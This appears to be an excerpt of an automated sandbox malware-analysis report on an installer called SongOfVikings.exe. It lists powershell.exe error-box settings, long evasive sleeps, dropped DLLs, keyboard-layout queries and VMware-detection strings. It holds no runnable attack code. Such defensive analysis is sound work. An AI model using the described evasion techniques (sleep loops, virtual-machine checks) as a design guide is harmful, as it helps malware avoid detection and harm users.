Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3757	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2007	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3645
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 423

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\nsis7z.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\StdUtils.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\vk_swiftshader.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\vulkan-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\SongOfVikings\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\resources\elevate.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\db56a95c-619a-410d-ad51-8448947b0929.tmp.node	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\f1a1d769-375b-46b2-ad93-df5ca2abe3a4.tmp.node	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\SongOfVikings\libEGL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\libEGL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\SongOfVikings\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\SpiderBanner.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\d3dcompiler_47.dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5264	Thread sleep count: 3757 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5264	Thread sleep count: 2007 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6824	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6788	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2476	Thread sleep count: 3645 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2476	Thread sleep count: 423 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7432	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2132	Thread sleep time: -922337203685477s >= -30000s

Queries keyboard layouts

Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809

Source: C:\Users\user\Desktop\SongOfVikings.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File Volume queried: C:\Users\user\AppData\Local\Programs\SongOfVikings FullSizeInformation
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File Volume queried: C:\Users\user\AppData\Local\Programs\SongOfVikings FullSizeInformation
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File Volume queried: C:\Users\user FullSizeInformation
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File Volume queried: C:\Users\user FullSizeInformation

Source: C:\Users\user\Desktop\SongOfVikings.exe	Code function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_004059CC
Source: C:\Users\user\Desktop\SongOfVikings.exe	Code function: 0_2_004065FD FindFirstFileW,FindClose,	0_2_004065FD
Source: C:\Users\user\Desktop\SongOfVikings.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\SongOfVikings.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Programs\SongOfVikings	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Programs	Jump to behavior

Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMware
Source: SongOfVikings.exe, 00000000.00000003.1907195515.00000000054B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ::$DATAca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}g,K
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: IIAMDARMAppleBroadcomGoogleIntelMesaMicrosoftNVIDIAImagination TechnologiesQualcommSamsung Electronics Co., Ltd.VivanteVMwareVirtIOTestX
Source: SongOfVikings.exe, 00000000.00000003.1839965990.00000000051BD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmncVMware Screen Codec / VMware Videovp5On2 VP5vp6On2 VP6vp6fOn2 VP6 (Flash version)targaTruevision Targa imageimage/x-targaimage/x-tga
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: (IsLinux() && isVMWare) \|\| (IsAndroid() && isNvidia) \|\| (IsAndroid() && GetAndroidSdkLevel() < 27 && IsAdreno5xxOrOlder(functions)) \|\| (IsAndroid() && IsMaliT8xxOrOlder(functions)) \|\| (IsAndroid() && IsMaliG31OrOlder(functions))
